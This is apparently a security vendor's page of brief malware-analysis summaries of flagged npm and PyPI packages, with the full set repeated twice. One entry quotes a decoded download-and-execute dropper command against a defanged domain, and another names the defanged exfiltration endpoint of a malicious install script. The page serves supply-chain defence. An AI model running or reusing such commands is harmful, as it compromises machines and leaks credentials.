Secure your dependencies. Ship with confidence.

The module is mostly benign utility code for model name mapping and validation. However, the top-of-file behavior that fetches JavaScript from unpkg.com and evals it at runtime is a high-risk supply-chain vulnerability: it enables arbitrary remote code execution in the host process and thus can be used for credential theft, backdoors, or exfiltration if the remote asset is compromised. If you cannot guarantee integrity/trust of the fetched script, this file should be considered unsafe. Replace the runtime remote fetch+eval with an explicit, versioned dependency or add integrity checks before execution.

This assembly contains a heavy obfuscation/protector/loader component that reads encrypted embedded resources, decrypts them, constructs cryptographic keys, allocates and writes executable memory, patches JIT/method pointers and invokes dynamically written/native code. Those behaviors are characteristic of an in-memory loader/unpacker or runtime protector and are high-risk for supply-chain abuse. Even if used for legitimate protection, the capability to inject and execute arbitrary native code in-process is dangerous for downstream consumers. Treat this package as suspicious: avoid using it in sensitive environments unless you can verify the embedded payloads and trust the publisher. Recommend removal or further deep analysis (inspect embedded resources and decrypted payload) before use.

The fragment implements a deployment workflow with remote SSH/SCP operations and WeChat-based status reporting. While this can be legitimate in tightly controlled CI/CD scenarios, it presents clear security risks: remote deletion of directories, handling of credentials, and exposure of deployment details to external services. Treat this as high-risk; implement input validation, restrict remote commands, minimize credential exposure, enforce least-privilege SSH usage, add robust auditing/logging, and consider moving destructive steps behind explicit approvals or safer deployment gates.

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles the legitimate 'azure' package, suggesting it could be a typosquat. The maintainers list includes 'npm', which is not a specific individual or organization, adding to the suspicion. The description does not provide any distinct purpose or functionality, further indicating it might be a placeholder to prevent typosquatting.

Live on npm for 7 hours and 24 minutes before removal. Socket users were protected even while the package was live.

This file is heavily obfuscated and contains routines that decrypt embedded payloads and perform native memory and process manipulation (VirtualAlloc, WriteProcessMemory, VirtualProtect, OpenProcess, LoadLibrary, GetProcAddress). It creates delegates from unmanaged memory and can execute data as code. These are strong indicators of an in-memory loader / code injection capability. Treat this module as highly suspicious and high risk for supply-chain or runtime code-execution abuse. If this behavior is unexpected for the package, do not use it and perform deeper forensic and provenance checks (signature, publisher, original source).

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

This module contains a critical unsafe pattern: eval() used on content extracted from untrusted remote HTML, creating a direct remote code execution vector. Additional risky behaviors include decoding obfuscated payloads from HTML and deserializing content from remote hosts, and returning stream URLs derived from attacker-controllable sources. Do not run this code in privileged or production environments as-is. Recommended remediation: remove eval and replace with strict, safe parsers (e.g., json.loads with validation or ast.literal_eval on strictly validated input), validate regex captures against a whitelist/expected schema, sanitize and validate any URLs returned, and audit helper functions (b64decode, scrape_sources, scrape_subtitles) and network request handling. Also repair and re-evaluate the syntactic issues in the snippet before trusting behavior.

This module downloads a platform/architecture-specific native Node addon (.node) from a hardcoded remote GitHub raw endpoint into the local working directory, using a runtime-configured proxy and performing no integrity/authenticity verification. Even without explicit execution in the snippet, the behavior is a high supply-chain risk pattern consistent with staged native payload delivery. Review the package for where/if the downloaded .node file is later required/loaded, and enforce hash/signature verification (or remove the download-on-install behavior if not strictly necessary).

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 4 hours and 57 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is high-risk because it contains an explicit HTTP-driven pathway to execute shell commands using a request-supplied command (even though execution time is clamped). Additionally, it implements a broad /api/* proxy that forwards raw requests to an upstream URL derived from agent selection. If strict authentication/authorization, command allowlisting/sanitization, and tightly constrained upstream URL construction/forwarding are not enforced in the referenced handlers, this effectively provides remote control-plane capabilities with potential for RCE and proxy abuse.

This module contains clear malicious/supply-chain behavior: it reconstructs private keys by concatenating caller-supplied PRIVATE values with embedded KEY fragments, then uses those keys to sign and broadcast transactions that transfer SOL and tokens to hardcoded recipient addresses and distribute funds. Embedded RPC endpoints and Telegram notification calls support exfiltration and attacker visibility. Do not use this package; it attempts to steal funds from wallets by automating signed transfers once given the expected PRIVATE input. Immediate remediation: remove the package, rotate any keys/seeds that may have been exposed, and audit systems that used it.

This install script performs direct data exfiltration of sensitive host and environment information to an external server. The preinstall script uses curl to POST a JSON payload containing hostname, username, current working directory, and base64-encoded environment variables to https://acqpjt693ayq7tk6nslhuv8zaqgh47sw[.]rt-notify[.]com/. This is high risk as it likely leaks secrets, credentials, API keys, and user/system metadata that may be present in environment variables. The exfiltration occurs automatically during package installation when users often have elevated privileges and access to sensitive project environments.

This file implements a DNS-based command-and-control transport (Sliver implant DNS C2). It encodes, fragments and transmits encrypted payloads via DNS TXT queries to an operator-controlled parent domain and receives commands the same way. The code provides full C2 capabilities (session bootstrap, encrypted send/receive, block reassembly). It also includes weaknesses: insecure random number generator for nonces/IDs and an unbounded in-memory replay cache. Given its functionality, this code is malicious in the general software supply-chain context and poses a high security risk if present in a dependency.

This module contains multiple high-risk, supply-chain behaviors: embedded credentials written to disk; self-modifying source; installer-time creation and execution of temporary Python code; pervasive shell execution (many with destructive rm/rmdir commands); and automated uploads via twine. These are consistent with malicious or backdoor-capable packaging scripts. Treat as hostile: do not run this code in CI, developer machines, or production, and remove or quarantine the package until a full trusted audit is completed.

The code implements remote dynamic class loading and execution via network fetch and reflection. While such a mechanism can be legitimate for plugin ecosystems, it introduces a clear remote-code-execution risk in supply-chain contexts. It should be treated as high-risk for unauthenticated payload loading and require strong controls: TLS, payload signing/verification, strict allowlists, sandboxing, and minimum privileges. If kept, ensure robust auditing and runtime protections.

The dominant security concern is the explicit use of eval on data-derived JSON within CarbonPHP.handlebars, which can enable arbitrary code execution if data is attacker-controlled. Additional concerns include unsanitized dynamic script/template loading and a busy-wait sleep that can degrade performance and potentially expose timing information. Overall risk is high due to the eval pattern and dynamic content loading without strong sanitization.

This module is highly consistent with supply-chain malware/RAT behavior rather than a legitimate library. It acts as a remote agent controlled via WebSocket, performs host fingerprinting, reads and exfiltrates local files (including binary exfiltration via base64/data URLs), executes arbitrary shell/Git commands on demand, persists credential-like state under a homedir directory, and can terminate processes. The heavy obfuscation and remote C2 control loop significantly elevate security risk.

The code provides powerful server management capabilities with multiple high-risk endpoints. The combination of dynamic npm installation, self-update, and runtime code loading from installed packages creates a strong potential for remote code execution and supply-chain manipulation if proper authentication and input validation are not robustly enforced. The most critical risk stems from dynamic imports after arbitrary package installation and the self-update path, which could be exploited to alter host behavior or inject malicious code.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

The code calls a register function with a suspicious external URL containing a secret token, which may indicate potential data exfiltration or backdoor communication. The lack of implementation details for the register function prevents definitive conclusions, but the presence of sensitive data in the URL and unknown external communication poses a moderate security risk. The reports reviewed are invalid and do not provide meaningful analysis. Further investigation of the register function and the external domain is necessary.

Live on npm for 2 hours and 19 minutes before removal. Socket users were protected even while the package was live.

This persistent-class mechanism enables faithful cross-process reconstruction by executing embedded source during unpickling. However, it introduces a pronounced security risk: untrusted or tampered pickle payloads can trigger arbitrary code execution through exec of module_src. The pattern is dangerous in untrusted environments and should be avoided or heavily mitigated (code signing, strict integrity checks, sandboxed execution, or eliminating dynamic exec during unpickling). Prefer safer persistence strategies that do not execute arbitrary code from metadata.

This code collects sensitive runtime information (notably the entire process.env) and attempts to exfiltrate it to a hardcoded external domain via HTTPS POST. The pattern is consistent with credential/secret harvesting and unauthorized telemetry exfiltration. Although the pasted snippet contains a syntax error (missing closing quote) that prevents execution as-is, the intent and risk are clear and severe if corrected. Treat any package containing this behavior as malicious: avoid execution, remove from environments, and rotate potentially leaked secrets.

Live on npm for 6 hours and 48 minutes before removal. Socket users were protected even while the package was live.

The module is mostly benign utility code for model name mapping and validation. However, the top-of-file behavior that fetches JavaScript from unpkg.com and evals it at runtime is a high-risk supply-chain vulnerability: it enables arbitrary remote code execution in the host process and thus can be used for credential theft, backdoors, or exfiltration if the remote asset is compromised. If you cannot guarantee integrity/trust of the fetched script, this file should be considered unsafe. Replace the runtime remote fetch+eval with an explicit, versioned dependency or add integrity checks before execution.

This assembly contains a heavy obfuscation/protector/loader component that reads encrypted embedded resources, decrypts them, constructs cryptographic keys, allocates and writes executable memory, patches JIT/method pointers and invokes dynamically written/native code. Those behaviors are characteristic of an in-memory loader/unpacker or runtime protector and are high-risk for supply-chain abuse. Even if used for legitimate protection, the capability to inject and execute arbitrary native code in-process is dangerous for downstream consumers. Treat this package as suspicious: avoid using it in sensitive environments unless you can verify the embedded payloads and trust the publisher. Recommend removal or further deep analysis (inspect embedded resources and decrypted payload) before use.

The fragment implements a deployment workflow with remote SSH/SCP operations and WeChat-based status reporting. While this can be legitimate in tightly controlled CI/CD scenarios, it presents clear security risks: remote deletion of directories, handling of credentials, and exposure of deployment details to external services. Treat this as high-risk; implement input validation, restrict remote commands, minimize credential exposure, enforce least-privilege SSH usage, add robust auditing/logging, and consider moving destructive steps behind explicit approvals or safer deployment gates.

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles the legitimate 'azure' package, suggesting it could be a typosquat. The maintainers list includes 'npm', which is not a specific individual or organization, adding to the suspicion. The description does not provide any distinct purpose or functionality, further indicating it might be a placeholder to prevent typosquatting.

Live on npm for 7 hours and 24 minutes before removal. Socket users were protected even while the package was live.

This file is heavily obfuscated and contains routines that decrypt embedded payloads and perform native memory and process manipulation (VirtualAlloc, WriteProcessMemory, VirtualProtect, OpenProcess, LoadLibrary, GetProcAddress). It creates delegates from unmanaged memory and can execute data as code. These are strong indicators of an in-memory loader / code injection capability. Treat this module as highly suspicious and high risk for supply-chain or runtime code-execution abuse. If this behavior is unexpected for the package, do not use it and perform deeper forensic and provenance checks (signature, publisher, original source).

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

This module contains a critical unsafe pattern: eval() used on content extracted from untrusted remote HTML, creating a direct remote code execution vector. Additional risky behaviors include decoding obfuscated payloads from HTML and deserializing content from remote hosts, and returning stream URLs derived from attacker-controllable sources. Do not run this code in privileged or production environments as-is. Recommended remediation: remove eval and replace with strict, safe parsers (e.g., json.loads with validation or ast.literal_eval on strictly validated input), validate regex captures against a whitelist/expected schema, sanitize and validate any URLs returned, and audit helper functions (b64decode, scrape_sources, scrape_subtitles) and network request handling. Also repair and re-evaluate the syntactic issues in the snippet before trusting behavior.

This module downloads a platform/architecture-specific native Node addon (.node) from a hardcoded remote GitHub raw endpoint into the local working directory, using a runtime-configured proxy and performing no integrity/authenticity verification. Even without explicit execution in the snippet, the behavior is a high supply-chain risk pattern consistent with staged native payload delivery. Review the package for where/if the downloaded .node file is later required/loaded, and enforce hash/signature verification (or remove the download-on-install behavior if not strictly necessary).

This module zips a local directory and uploads it to a specific S3 bucket. The code contains hardcoded AWS credentials and a hardcoded bucket name, which is a severe security issue and could enable data exfiltration if these credentials are valid. There are additional problems: a likely return-value bug (undefined variable s3_ke), possible insufficient path-safety around symlinks, and verbose logging of paths. There is no evidence of obfuscation or active payloads like reverse shells or eval-based code execution. Treat this package as high-risk until credentials are removed/rotated and the code is corrected and reviewed.

Live on pypi for 5 days, 4 hours and 57 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is high-risk because it contains an explicit HTTP-driven pathway to execute shell commands using a request-supplied command (even though execution time is clamped). Additionally, it implements a broad /api/* proxy that forwards raw requests to an upstream URL derived from agent selection. If strict authentication/authorization, command allowlisting/sanitization, and tightly constrained upstream URL construction/forwarding are not enforced in the referenced handlers, this effectively provides remote control-plane capabilities with potential for RCE and proxy abuse.

This module contains clear malicious/supply-chain behavior: it reconstructs private keys by concatenating caller-supplied PRIVATE values with embedded KEY fragments, then uses those keys to sign and broadcast transactions that transfer SOL and tokens to hardcoded recipient addresses and distribute funds. Embedded RPC endpoints and Telegram notification calls support exfiltration and attacker visibility. Do not use this package; it attempts to steal funds from wallets by automating signed transfers once given the expected PRIVATE input. Immediate remediation: remove the package, rotate any keys/seeds that may have been exposed, and audit systems that used it.

This install script performs direct data exfiltration of sensitive host and environment information to an external server. The preinstall script uses curl to POST a JSON payload containing hostname, username, current working directory, and base64-encoded environment variables to https://acqpjt693ayq7tk6nslhuv8zaqgh47sw[.]rt-notify[.]com/. This is high risk as it likely leaks secrets, credentials, API keys, and user/system metadata that may be present in environment variables. The exfiltration occurs automatically during package installation when users often have elevated privileges and access to sensitive project environments.

This file implements a DNS-based command-and-control transport (Sliver implant DNS C2). It encodes, fragments and transmits encrypted payloads via DNS TXT queries to an operator-controlled parent domain and receives commands the same way. The code provides full C2 capabilities (session bootstrap, encrypted send/receive, block reassembly). It also includes weaknesses: insecure random number generator for nonces/IDs and an unbounded in-memory replay cache. Given its functionality, this code is malicious in the general software supply-chain context and poses a high security risk if present in a dependency.

This module contains multiple high-risk, supply-chain behaviors: embedded credentials written to disk; self-modifying source; installer-time creation and execution of temporary Python code; pervasive shell execution (many with destructive rm/rmdir commands); and automated uploads via twine. These are consistent with malicious or backdoor-capable packaging scripts. Treat as hostile: do not run this code in CI, developer machines, or production, and remove or quarantine the package until a full trusted audit is completed.

The code implements remote dynamic class loading and execution via network fetch and reflection. While such a mechanism can be legitimate for plugin ecosystems, it introduces a clear remote-code-execution risk in supply-chain contexts. It should be treated as high-risk for unauthenticated payload loading and require strong controls: TLS, payload signing/verification, strict allowlists, sandboxing, and minimum privileges. If kept, ensure robust auditing and runtime protections.

The dominant security concern is the explicit use of eval on data-derived JSON within CarbonPHP.handlebars, which can enable arbitrary code execution if data is attacker-controlled. Additional concerns include unsanitized dynamic script/template loading and a busy-wait sleep that can degrade performance and potentially expose timing information. Overall risk is high due to the eval pattern and dynamic content loading without strong sanitization.

This module is highly consistent with supply-chain malware/RAT behavior rather than a legitimate library. It acts as a remote agent controlled via WebSocket, performs host fingerprinting, reads and exfiltrates local files (including binary exfiltration via base64/data URLs), executes arbitrary shell/Git commands on demand, persists credential-like state under a homedir directory, and can terminate processes. The heavy obfuscation and remote C2 control loop significantly elevate security risk.

The code provides powerful server management capabilities with multiple high-risk endpoints. The combination of dynamic npm installation, self-update, and runtime code loading from installed packages creates a strong potential for remote code execution and supply-chain manipulation if proper authentication and input validation are not robustly enforced. The most critical risk stems from dynamic imports after arbitrary package installation and the self-update path, which could be exploited to alter host behavior or inject malicious code.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

The code calls a register function with a suspicious external URL containing a secret token, which may indicate potential data exfiltration or backdoor communication. The lack of implementation details for the register function prevents definitive conclusions, but the presence of sensitive data in the URL and unknown external communication poses a moderate security risk. The reports reviewed are invalid and do not provide meaningful analysis. Further investigation of the register function and the external domain is necessary.

Live on npm for 2 hours and 19 minutes before removal. Socket users were protected even while the package was live.

This persistent-class mechanism enables faithful cross-process reconstruction by executing embedded source during unpickling. However, it introduces a pronounced security risk: untrusted or tampered pickle payloads can trigger arbitrary code execution through exec of module_src. The pattern is dangerous in untrusted environments and should be avoided or heavily mitigated (code signing, strict integrity checks, sandboxed execution, or eliminating dynamic exec during unpickling). Prefer safer persistence strategies that do not execute arbitrary code from metadata.

This code collects sensitive runtime information (notably the entire process.env) and attempts to exfiltrate it to a hardcoded external domain via HTTPS POST. The pattern is consistent with credential/secret harvesting and unauthorized telemetry exfiltration. Although the pasted snippet contains a syntax error (missing closing quote) that prevents execution as-is, the intent and risk are clear and severe if corrected. Treat any package containing this behavior as malicious: avoid execution, remove from environments, and rotate potentially leaked secrets.

Live on npm for 6 hours and 48 minutes before removal. Socket users were protected even while the package was live.